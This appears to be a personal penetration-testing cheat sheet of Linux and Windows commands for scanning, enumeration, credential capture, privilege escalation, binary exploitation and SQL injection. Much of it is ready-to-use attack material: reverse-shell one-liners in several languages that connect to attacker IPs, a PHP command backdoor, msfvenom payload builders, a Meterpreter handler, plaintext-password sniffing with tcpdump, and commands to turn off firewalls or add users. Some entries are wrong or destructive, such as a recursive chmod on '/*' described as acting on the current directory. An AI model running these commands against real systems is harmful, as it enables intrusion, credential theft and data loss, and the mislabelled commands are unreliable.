Intro

Pentesting Cheatsheet

An unstructured list of bolts & clamps I have collected over time.

Linux

Privileges

find all setuid and setgid programs

find / -perm -6000 -print

set file immutable (even root cannot delete it)

chattr +i test.txt

set file append only. Can only add new content, not remove old

chattr +a test.txt

verify immutable flag (plus other flags)

lsattr

revoke to groups and other read+write+execution permission in the current and sub directories

chmod -R go-rwx /*

assigns to all user read+write+execution permission in the current and sub directories

chmod -R a+rx /*

allows file owner to be the only one authorized to delete their files

umask 0000

cat, grep & misc commands

cat all files recursively

find . -name '*.txt' -exec cat {} \;
find . -name '*' -exec ls -asl {} \; 2>/dev/null | grep passwd
find . -name foo -type f -print0 | xargs -0 grep "password"

find a pattern in a file and suppress stderr

grep 'pattern' file 2>/dev/null
grep -s 'pattern' file

Network Scanning

Unicorn UDP scan over tunnel interface (often faster than nmap)

unicornscan -mU -p 161 10.11.1.0/24 -i tap0

Masscan over tunnel

masscan -p1-65500 10.11.1.219 --interface tap0 --router-mac 00-50-56-89-35-90

nmap check all related vulnerabilities

nmap --script vuln [host]

Traffic Dump

Grab everything between two keywords

tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'

Grab user and pass ever plain http

tcpdump -i eth0  port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

SSH Port Forwarding

SSH local port forwarding
Make services on the remote network accessible to your host via a local listener. The service running on the remote host on TCP port 8834 is accessible by connecting to 8834 on the SSH client system.

ssh -L 8834:localhost:8834 user@taget_ip

SSH remote port forwarding
Make services on your local system / local network accessible to the remote host via a remote listener. The SSH server will be able to access TCP port 80 on 172.16.0.99 (a host accessible from the SSH client) by connecting to 127.0.0.1:8000 on the SSH server.

ssh -R 127.0.0.1:8000:172.16.0.99:80 10.0.0.1

Password cracking and wordlists

Crunch Worlist Generator

Crunch - Wordlist Generator
    @ - Lower case alpha characters
    , - Upper case alpha characters
    % - Numeric characters
    ^ - Special characters including space

    example:
    crunch 8 8 -t ,@@^^%%%

Custom dictionary from website

cewl -d 2 -m 5 -w docswords.txt http://docs.kali.org

Create wordlist in norwegian using words from Wikipedia

wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2

bzcat nowiki-latest-pages-articles.xml.bz2 | grep '^[a-zA-Z]' | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>="\/]/\ /g'```<br>``` | tr ' ' '\n' | sed 's/[0-9]//g' | sed 's/[^A-Za-z0-9]//g' | sed -e 's/./\L\0/g' ```<br>```| sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' | sort | uniq | pw-inspector -m1 -M20 > nowiki.lst

Reverse-shell oneliners

bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl

perl -e 'use Socket;$i="192.168.26.31";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i”);};’

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.26.31",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Command backdoor

<?php echo shell_exec($_GET['cmd']);?>

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 1234

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

#Xterm

xterm -display 10.0.0.1:1

SMB

List shares

smbclient -L 1.2.3.4

Connect to share

smbclient \\\\1.2.3.4\\SHARE

Nmap SMB scripts:

nmap -v -p 139,445 [IP] --script=smb-vuln-conficker.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-cve2009-3103.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms06-025.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms07-029.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms08-067.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-054.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-061.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms17-010.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-regsvc-dos.nse

SNMP

onesixtyone – c <community list file> -I <ip-address>
snmpwalk -c <community string> -v <version> <ip address>

MSFVenom

Windows

Staged reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Stageless (single) reverse TCP

msfvenom -p windows/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Linux

Staged reverse TCP

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf

Stageless (single) reverse TCP

msfvenom -p linux/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf

VBA/VBS payload

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

Meterpreter

Meterpreter handler template

use exploit/multi/handler
set PAYLOAD osx/x64/meterpreter/reverse_tcp
set LHOST 10.10.1.12
set LPORT 4444
set ExitOnSession false
exploit -j -z

Compiling

create object file, and link it

nasm -f elf -o shellcode.o shellcode.nasm
ld -melf_i386 -z execstack -o shellcode shellcode.o

compile in one go

gcc -z execstack -o shellcode shellcode.c

compile windows PE on kali 64bit

x86_64-w64-mingw32-gcc shell.c -o shell.exe

compile windows on kali 32bit

i686-w64-mingw32-gcc shell.c -o shell.exe

generates only ASM from C code

gcc -S -fno-asynchronous-unwind-tables -masm=intel *.c

Binary Exploitation and Reversing

ASLR

disable ASLR system-wide

echo 1 > /proc/sys/kernel/randomize_va_space

disable ASLR on a single bash session, instead of the whole OS

setarch $(uname --machine) --addr-no-randomize bash

PWN TOOLS

convert shellcode to machinecode

print(repr(asm(shellcraft.sh())))

Ret2LibC

finds /bin/sh location inside libc

(gdb) break main
Breakpoint 1 at 0x8048570
(gdb) run
Starting program: /root/Desktop/RE/intro_rev_binary_expl/exploitation/examples/hello

Breakpoint 1, 0x08048570 in main ()
(gdb) find 0xf7dba000,0xf7f8c000,"/bin/sh"
0xf7f35988
1 pattern found.

RADARE2

Cheat sheet
https://github.com/zxgio/r2-cheatsheet/blob/master/r2-cheatsheet.pdf

Windows

Version information

WINDOWS NT
5.0   2000
5.1   XP/legacy
5.2   XP64/Server 2003 (R2)
6.0   Vista/Server 2008
6.1   7/Server 2008R2/Home Server 2011
6.2   8/Server 2012
6.3   8.1/Server 2012R2
10.0  10/Server 2016

Basic enumeration

General system info

systeminfo

Get hostname

hostname

Current user

whoami

Current user, group and permissions

whoami /all

IP and Networking

ipconfig /all
route print
netstat -bano
netsat -r

wingrep

command | findstr /C:"str"

current path

path

run target “executable” with user profile permissiosn for /user:

runas /profile /user:administrator "C:\absolute\path\pcoff.exe"

run code excution in background

START /B process.exe

execute all files in a directory

for %%i in (C:\abs\path\*) do %%i
for /F "usebackq" %i in (`dir /b C:\macros\Day\`) DO %i

User

whoami
net users

list users in current domain

net user /domain

list user info

net user username

add local system user

net user name pass /add

check user’s network group membership

net user name setpword
net user /DOMAIN %USERNAME%

check another user’s information

net user /domain user

list users in AD group

net group "Domain Users" /domain

list domain local group users

net localgroup "administrators" /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net group “Domain Controllers” /domain
NET LOCALGROUP "Remote Desktop Users" trinity /ADD

List password policy for locahost

net accounts
net accounts /domain

Networking

view full ARP table

arp -A

view available network share hosts

net view

view available shares on host

net view \\HOST

Queries NBNS/SMB (SAMBA) and tries to find all hosts in ‘otherdomain’

net view /domain:otherdomain

Lists tasks w/users running those tasks on a remote system

tasklist /V /S computername

Firewall

netsh firewall show state
netsh firewall show config
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

Configure nic to user dhcp

netsh interface ip set address local dhcp

open port (for rdesktop)

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

close port (for rdesktop)

netsh advfirewall firewall add rule name="Block mssql attack ips" dir=in action=block protocol=TCP localport=1433 remoteip=22.75.175.213

Auto-Start Directories

Windows NT 6.1,6.0
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5,0
%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x
%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

SMB

map remote hard drive to local path

net use * \\remote_ip\c$ password /u:remote_ip\username

verify shares

net use [sharename]

Powershell

locally use PS to execute command as admin, given admin password

$user = "PC\Administrator";
$password = "test1234";
$pass_string = convertTo-SecureString -AsPlaintext -Force $password;
$cred = new-object system.management.automation.pscredential($user, $pass_string);
Invoke-Command -ComputerName 127.0.0.1 -Credential $cred -ScriptBlock { type C:/Users/Administrator/Desktop/root.txt ; type C:/Users/h.potter/user.txt }

Privilege Escalation

Full permissions for Everyone or Users? replace (F) with (M) to check for modify rights

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

Unquoted service paths?

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

Passwords in registry?

reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s


Web Applications

Parsing

curl [IP] -s -L | html2text -width '99' | uniq

Injections

SQLi

SQLmap example

sqlmap -m [external url list]  --crawl=6 --threads=10 --random-agent --dbms=mysql|mssql|postgresql|orcale --level=5 --risk=3